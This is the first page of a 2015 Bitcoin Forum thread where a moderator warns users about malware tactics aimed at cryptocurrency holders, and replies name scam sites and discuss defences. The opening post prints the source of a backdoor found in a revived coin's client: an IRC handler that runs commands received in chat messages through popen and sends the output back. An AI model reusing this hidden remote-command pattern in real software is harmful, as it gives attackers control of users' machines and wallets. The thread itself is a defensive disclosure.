Bitcoin Forum
October 18, 2017, 04:59:22 PM *
News: Latest stable version of Bitcoin Core: 0.15.0.1  [Torrent]. (New!)
 
   Home   Help Search Donate Login Register  
Pages: [1] 2 3 4 5 6 7 8 9 10 11 12 »  All
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 118396 times)
grue
Global Moderator
Legendary
*
Offline Offline

Activity: 2016



View Profile
January 25, 2015, 10:33:22 PM
 #1

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

It is pitch black. You are likely to be eaten by a grue.

Tired of annoying signature ads? Ad block for signatures
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1508345962
Hero Member
*
Offline Offline

Posts: 1508345962

View Profile Personal Message (Offline)

Ignore
1508345962
Reply with quote  #2

1508345962
Report to moderator
1508345962
Hero Member
*
Offline Offline

Posts: 1508345962

View Profile Personal Message (Offline)

Ignore
1508345962
Reply with quote  #2

1508345962
Report to moderator
1508345962
Hero Member
*
Offline Offline

Posts: 1508345962

View Profile Personal Message (Offline)

Ignore
1508345962
Reply with quote  #2

1508345962
Report to moderator
Rolandvoda
Member
**
Offline Offline

Activity: 109


View Profile
January 29, 2015, 05:10:56 AM
 #2

Could you please post the coin's name and maybe others that you may have found ?
muhrohmat
Sr. Member
****
Offline Offline

Activity: 252


View Profile
January 31, 2015, 07:33:18 AM
 #3

correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

garmin
Hero Member
*****
Offline Offline

Activity: 499


View Profile
February 03, 2015, 12:08:47 AM
 #4

I was checking some IRC bootstrap connections and found some additional info.

Kinda looks ripe for the picking by a exploit.

https://bitcointalk.org/index.php?topic=943519.new#new

 Undecided
crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
February 11, 2015, 12:45:31 AM
 #5

I'm adding this to the list of possible scams:

https://bitcointalk.org/index.php?topic=951827.0
TrinityCoin
Sr. Member
****
Offline Offline

Activity: 264


View Profile
February 11, 2015, 04:31:57 AM
 #6

Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.

shavers
Sr. Member
****
Offline Offline

Activity: 342



View Profile
February 14, 2015, 10:04:48 PM
 #7

I'd like to add the bitcoinwisdomapp.com to the blacklist. It's a keylogger behind it.

Aber wie willst du denn einmal sterben, Narziß, wenn du doch keine Mutter hast?
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
February 17, 2015, 05:40:48 AM
 #8

Any thoughts ?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/ block explorer site.

BE VARY WARY OF THE MULTIFAUCET BLOCK EXPLORER !

I searched an for an address and was left with having to fight virus scan pop ups for a few minutes.







crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
February 17, 2015, 05:54:00 AM
 #9

The multifaucet.tk wallet search would redirect you to a third-party ad network. Subsequently, the ad network would redirect you to the destination page -- which, in this case, is the result of the wallet search. I'm in California; the ad network being shown is adf.ly. Depending on your geographic location, you may get a different ad network. These third-party sites generate revenue for multifaucet upon every ad view. This is paid for by the ad publisher. However, multifaucet has no control of what ads are being shown. To maximize their profits, ad publishers may show ads that may lead to malware, which promises higher margins than conventional ads.

In my case, I encountered the following page:

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
February 17, 2015, 06:04:20 AM
 #10

In my case, IE11 was completely locked up and I had to be fast with the "end process" clicks.

I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install. lol

Gabe
Jr. Member
*
Offline Offline

Activity: 36


View Profile
February 18, 2015, 07:30:11 PM
 #11

That's terrible. Anyone of you encountered the ransom cryptolocker? I heard about it not long ago. What is wrong with people?
fartbags
Legendary
*
Offline Offline

Activity: 1176


View Profile
March 03, 2015, 01:18:57 AM
 #12

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
March 03, 2015, 01:23:24 AM
 #13

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

Yes, that would be one solution.
Decksperiment
Sr. Member
****
Offline Offline

Activity: 364


Uniting the Power of Sound & Ceation


View Profile
March 03, 2015, 04:14:52 AM
 #14

Wow.. this is like so pointless (not the thread, the 'hack') nowadays.. why not just place a keylogger in bios, then no matter what os folks use, you have 100% access to whatever machines are connected?

Edit: Hint: Speedracer.

BTC: 1654DECHaU4QyYXom9ooRBvt2zmULR3MfZ
dooglus
Legendary
*
Offline Offline

Activity: 2310



View Profile
March 08, 2015, 07:37:28 PM
 #15

Edit: Hint: Speedracer.

http://events.ccc.de/congress/2014/Fahrplan/system/attachments/2565/original/speed_racer_whitepaper.pdf

Just-Dice                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   Play or Invest                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   1% House Edge
bitsat alien
Full Member
***
Offline Offline

Activity: 122


View Profile
March 13, 2015, 06:32:45 AM
 #16

Thanks for being on top of this and keeping us informed, we do appreciate it!
Decksperiment
Sr. Member
****
Offline Offline

Activity: 364


Uniting the Power of Sound & Ceation


View Profile
March 13, 2015, 04:03:26 PM
 #17


Lol, this was just the beginning, If I can put a keylogger in my 64mb lappy bios.. I can do it with anyone..

Keep in mind this hack was released solely by them to LOCKDOWN your bios so you cant tamper with overclocking your machine.. the security they released after this demonstration is exactly how they get into your bios as only the NSA would LOVE.

Edit: There is need for a new style of bios security, like anti virus, which, when your bios gets bigger, can load in bios FIRST, before bios is loaded.. it's not as hard as you think, but I'm not THAT good..

BTC: 1654DECHaU4QyYXom9ooRBvt2zmULR3MfZ
AshCoiner
Newbie
*
Offline Offline

Activity: 10


View Profile
March 31, 2015, 03:52:25 AM
 #18

I just received something like this an hour ago.  I was surfing Ebay and laughed when I saw PimpCash.  Having to see if it was real, I went to pimpcash.com. Immediately something like what you showed came up.  However, for me, it pretended to be my service provider and gave me a number to call.  I confess I did try to call but the ring didn't sound right.  Sounded like an old telephone.  I hung up and rebooted my computer.  Things seem to be ok now.  I ran a quick scan and all seems to be okay.  Is there anything else I should do to check to see if my computer is okay?

Any thoughts ?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/ block explorer site.

BE VARY WARY OF THE MULTIFAUCET BLOCK EXPLORER !

I searched an for an address and was left with having to fight virus scan pop ups for a few minutes.
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
April 01, 2015, 11:39:02 PM
 #19

Please check your "program files(x86) and the youruser/appdata/local/TEMP folders ! The ASN client is a remote desktop hack !

https://bitcointalk.org/index.php?topic=984878.msg10951987#msg10951987




ed_teech
Hero Member
*****
Offline Offline

Activity: 506


Jahaha


View Profile
April 10, 2015, 09:22:12 PM
 #20

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Pages: [1] 2 3 4 5 6 7 8 9 10 11 12 »  All
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!